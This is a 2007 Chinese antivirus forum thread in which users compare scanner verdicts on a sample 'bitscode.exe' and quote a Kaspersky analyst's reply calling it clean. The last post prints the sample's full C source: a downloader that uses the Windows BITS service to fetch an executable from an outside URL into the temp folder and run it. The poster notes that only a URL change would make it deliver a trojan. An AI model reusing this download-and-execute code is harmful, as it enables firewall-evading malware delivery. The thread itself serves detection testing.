serious code

lanvin

lanvin

红伞已经回复是木马，不过现在是过红伞的
下次升级就可以杀了

欠妳緈諨

NOD32和AVAST  MISS

dyw1021

NOD  32。。。。。。。。。。。。。。。。。。。。。。。。。

kfcnknight

不像是有害了的……

[ 本帖最后由 kfcnknight 于 2007-5-16 18:48 编辑 ]

fanrubin

卡6只有在程序运行后报警。而且延迟一会。不过还是报了

[ 本帖最后由 fanrubin 于 2007-5-16 18:56 编辑 ]

gwg829

启发之  KIS  7.99  误报啊　[:27:]


Hello.
No malicious software was found in the attached file.

Please quote all when answering.
-----------------
Regards, Kirill Erakhtin
Virus Analyst, Kaspersky Lab.

Ph.: +7(095) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.
http://www.kaspersky.com/trials - trial version


> Attachment: bitscode.rar

>  Here is a new one , KIS 7.0.0.99 have check it out !
>    please check it again.
>    Thank you
>     
>    Possibly infected: virus Downloader (modification)
>    c:\documents and
settings\gwg\?ÀÃæ\code\bitscode.exe 17.5 KB

[ 本帖最后由 gwg829 于 2007-5-16 21:31 编辑 ]

uhthn2002

VBA32 MISS

harry_chang2003

PCC Intellitrap啟發式技術報了

solcroft

虽然稍微修改一下URL，便可以下载木马，但这个咚咚完全无害

1. // This is version 2 of bitscode.exe
   
2. // The newer version downloads and starts fwbypassalert.exe in the users temp directory
   
3. #define _WIN32_WINNT 0x0400
   
4. #define _WIN32_DCOM
   
5. #include <stdio.h>
   
6. #include <windows.h>
   
7. #include <objbase.h>
   
8. #include <bits.h>
   
9. #pragma hdrstop
   
10. #pragma comment(lib, "bits.lib")
    
11. #pragma comment(lib, "ole32.lib")
    
12. int main()
    
13. {
    
14.   HRESULT hresult;
    
15.   IBackgroundCopyManager * bgcopyman;
    
16.   IBackgroundCopyJob * bgcopyjob;
    
17.   GUID jobid;
    
18.   WCHAR source[]=L"http://www.reconstructer.org/fwbypassalert";
    
19.   WCHAR target[MAX_PATH+20]=L"";
    
20.   WCHAR jobname[]=L"leeching_job";
    
21.   WCHAR tmppath[MAX_PATH];
    
22.   char exec[MAX_PATH+20]="";
    
23.   GetTempPathW(MAX_PATH,tmppath);
    
24.   swprintf(target,L"%s\\fwbypassalert.exe",tmppath);
    
25.   WideCharToMultiByte(CP_ACP,0,(const unsigned short*)target,MAX_PATH+20,exec,MAX_PATH+20,NULL,NULL);
    
26.   hresult = CoInitializeEx(NULL,COINIT_APARTMENTTHREADED);  
    
27.    
    
28.   if(SUCCEEDED(hresult))  
    
29.   {  
    
30.    hresult = CoInitializeSecurity(NULL,-1,NULL,NULL,  
    
31.                                  RPC_C_AUTHN_LEVEL_CONNECT,  
    
32.                                  RPC_C_IMP_LEVEL_IMPERSONATE,  
    
33.                                  NULL,EOAC_NONE,0);  
    
34.   }
    
35.   else
    
36.    return -1;
    
37.    
    
38.   if(SUCCEEDED(hresult))  
    
39.     hresult = CoCreateInstance(CLSID_BackgroundCopyManager,
    
40.                               0,  
    
41.                               CLSCTX_ALL,  
    
42.                               IID_IBackgroundCopyManager,  
    
43.                               (LPVOID *)&bgcopyman);     
    
44.   else  
    
45.         return -1;
    
46.   
    
47.   if (hresult==S_OK)
    
48.   {
    
49.     hresult = bgcopyman->CreateJob(jobname,BG_JOB_TYPE_DOWNLOAD,&jobid,&bgcopyjob);
    
50.     if (hresult==S_OK)
    
51.     {
    
52.        hresult = bgcopyjob->AddFile(source,target);
    
53.       
    
54.        if (hresult==S_OK)
    
55.        {
    
56.          BG_JOB_STATE state;
    
57.          bgcopyjob->Resume();
    
58.          
    
59.          do
    
60.          {
    
61.            Sleep(100);
    
62.            hresult = bgcopyjob->GetState(&state);
    
63.          } while (state!=BG_JOB_STATE_TRANSFERRED);
    
64.          
    
65.          bgcopyjob->Complete();
    
66.          WinExec(exec, SW_SHOW);
    
67.        }
    
68.        bgcopyjob->Release();
    
69.     }
    
70.     bgcopyman->Release();
    
71.   }
    
72.   CoUninitialize();
    
73.   return 0;
    
74. }

复制代码